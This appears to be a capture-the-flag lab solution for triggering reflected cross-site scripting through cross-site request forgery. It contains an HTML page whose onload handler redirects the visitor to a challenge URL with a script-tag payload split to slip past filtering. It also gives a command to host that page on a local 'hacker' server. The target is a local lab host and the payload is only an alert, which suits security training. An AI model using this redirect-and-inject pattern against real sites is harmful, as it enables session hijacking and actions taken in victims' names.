Triggering XSS through CSRF
index.html:
<!DOCTYPE html>
<html>
<body onload="window.location='http://challenge.localhost/ephemeral?msg='+'<'+'script>alert("PWNED")</script'+'>'"></body>
</html>Run in the directory of index.html:
python3 -m http.server 1337 --bind hacker.localhost